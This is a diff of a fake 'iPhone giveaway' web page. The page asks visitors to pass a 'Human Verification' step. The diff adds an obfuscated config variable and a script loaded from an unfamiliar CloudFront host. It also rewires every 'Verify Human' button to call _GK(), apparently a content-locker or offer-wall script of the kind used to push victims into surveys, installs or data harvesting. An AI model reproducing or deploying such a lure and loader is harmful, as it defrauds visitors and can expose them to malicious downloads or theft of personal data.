--- a/apple/index.html
+++ b/apple/index.html
@@ -25,7 +25,10 @@
 <!-- Bidvertiser2083879 -->
 <meta name="exoclick-site-verification" content="eaac69ce4aafcc5669c102d7c580dc1f">
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/hunter277/blogger-css/style.css">
-
+<script type="text/javascript">
+    var uQCet_WEb_glpSDc={"it":4462359,"key":"21dd2"};
+</script>
+<script src="https://d2v7l2267atlz5.cloudfront.net/bdc29cc.js"></script>
 
 </head>
 
@@ -162,7 +165,8 @@ Firstly, ensure that you carefully read and comprehend the giveaway rules and re
                             In ordrer to prevent abuse and make sure that users is real not robot , we have added Human
                             Verifcation<br>
                         </p>
-                        <a href="https://doctoredits.com/iphone2025" target="_blank"><button>Verify Human</button></a>
+                        <button onclick="_GK()">Verify Human</button>
+
                     </div>
         </div>
 
@@ -184,7 +188,7 @@ Firstly, ensure that you carefully read and comprehend the giveaway rules and re
                     In ordrer to prevent abuse and make sure that users is real not robot , we have added Human
                     Verifcation<br>
                 </p>
-                <a href="https://doctoredits.com/iphone2025" target="_blank"><button>Verify Human</button></a>
+                <button onclick="_GK()">Verify Human</button>
             </div>
         </div>
     </div>
@@ -206,7 +210,7 @@ Firstly, ensure that you carefully read and comprehend the giveaway rules and re
                     In ordrer to prevent abuse and make sure that users is real not robot , we have added Human
                     Verifcation<br>
                 </p>
-                <a href="https://doctoredits.com/iphone2025" target="_blank"><button>Verify Human</button></a>
+                <button onclick="_GK()">Verify Human</button>
             </div>
         </div>
     </div>
@@ -226,7 +230,7 @@ Firstly, ensure that you carefully read and comprehend the giveaway rules and re
                     In ordrer to prevent abuse and make sure that users is real not robot , we have added Human
                     Verifcation<br>
                 </p>
-                <a href="https://doctoredits.com/iphone2025" target="_blank"><button>Verify Human</button></a>
+                <button onclick="_GK()">Verify Human</button>
             </div>
         </div>
     </div>
@@ -247,7 +251,7 @@ Firstly, ensure that you carefully read and comprehend the giveaway rules and re
                     In ordrer to prevent abuse and make sure that users is real not robot , we have added Human
                     Verifcation<br>
                 </p>
-                <a href="https://doctoredits.com/iphone2025" target="_blank"><button>Verify Human</button></a>
+                <button onclick="_GK()">Verify Human</button>
             </div>
         </div>
 
@@ -270,7 +274,7 @@ Firstly, ensure that you carefully read and comprehend the giveaway rules and re
                     In ordrer to prevent abuse and make sure that users is real not robot , we have added Human
                     Verifcation<br>
                 </p>
-                <a href="https://doctoredits.com/iphone2025" target="_blank"><button>Verify Human</button></a>
+                <button onclick="_GK()">Verify Human</button>
             </div>
         </div>
     </div>
